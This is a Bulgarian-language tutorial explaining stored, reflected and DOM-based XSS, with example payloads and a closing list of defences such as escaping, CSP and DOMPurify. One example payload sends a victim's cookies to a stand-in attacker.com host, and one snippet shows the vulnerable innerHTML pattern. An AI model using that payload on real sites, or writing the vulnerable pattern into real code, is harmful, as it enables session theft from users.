Какво е XSS атака и защо е толкова опасна?

Cross-Site Scripting (XSS) атаките са един от най-често срещаните и опасни уязвимости в уеб приложенията.

Те позволяват на нападателите да инжектират злонамерен код (обикновено JavaScript) в уеб страници, които се разглеждат от други потребители. Тази техника може да се използва за кражба на данни, сесии, както и за пренасочване към злонамерени сайтове.

Видове XSS атаки

1. Stored (Персистентна) XSS

Това е най-опасният тип XSS атака. При нея злонамереният код се съхранява в сървъра и се зарежда всеки път, когато някой потребител разглежда заразената страница. Например, нападателят може да инжектира скрипт в полето за коментари на блог, който се изпълнява всеки път, когато друг потребител преглежда този коментар.

<!-- Пример за Stored XSS атака -->
<input type="text" value="<script>alert('XSS атака!');</script>">

2. Reflected (Отразена) XSS

Този тип атака се случва, когато уеб приложението незабавно връща данните обратно на потребителя без да ги филтрира или проверява. Обикновено тези атаки се извършват чрез URL адреси или формуляри, където злонамереният код се включва в параметрите на заявката.

<!-- Пример за Reflected XSS атака -->
<form action="https://example.com/search" method="GET">
  <input type="text" name="q">
  <button type="submit">Търси</button>
</form>

URL с вградена атака: https://example.com/search?q=<script>alert('XSS атака!');</script>

3. DOM-Based XSS

DOM-базираният XSS се случва, когато манипулациите върху Document Object Model (DOM) позволяват инжектирането на скриптове, без да са засегнати HTTP отговорите на сървъра. Тези атаки са трудни за откриване, тъй като всичко се случва на клиентската страна.

// Пример за DOM-based XSS
let search = document.location.search;
document.body.innerHTML = "Търсене: " + search;

Ако URL адресът е https://example.com/?q=<script>alert('XSS атака!');</script>, скриптът ще се изпълни директно в браузъра.

Как се осъществява XSS атака?

1. Инжектиране на скрипт: Нападателят инжектира злонамерен JavaScript код в уязвимо поле на уебсайта (например, форма за коментари или търсене).
2. Изпълнение в браузъра на жертвата: Кодът се изпълнява в браузъра на потребителя, като използва неговата сесия и привилегии.
3. Кражба на данни: Злонамереният код може да краде „cookies“, токени за сесии или друга чувствителна информация.

Пример за реална XSS атака

Нека разгледаме пример, където атакуващият инжектира код в секция за коментари на сайт:

<!-- Злонамерен коментар -->
<input type="text" value="<script>document.write('<img src=\'http://attacker.com/steal?cookie=' + document.cookie + '\' />');</script>">

Когато жертвата отвори страницата и коментарът се зареди, JavaScript кодът ще бъде изпълнен и ще изпрати „cookie“ информацията на злонамерен сайт.

Как да се защитим от XSS атаки?

1. Филтриране и валидиране на входа: Уеб приложенията трябва да проверяват всички входни данни. Никога не трябва да се доверяват на данни от потребителя.
2. Ескейпване на изхода: Всички изходни данни, които ще се показват на страница, трябва да бъдат правилно „ескейпнати“, за да се избегне инжектиране на скриптове.
3. Използване на Content Security Policy (CSP): CSP помага за предотвратяване на изпълнението на непозволени скриптове в браузъра на потребителя.
4. Sanitization: Използване на библиотеки, които премахват или неутрализират злонамерен код, като DOMPurify.

XSS атаките са сериозна заплаха за уеб приложенията, но с правилните мерки за сигурност, те могат да бъдат предотвратени. Винаги е важно да разберем какво стои зад такива уязвимости и как можем да защитим системите си.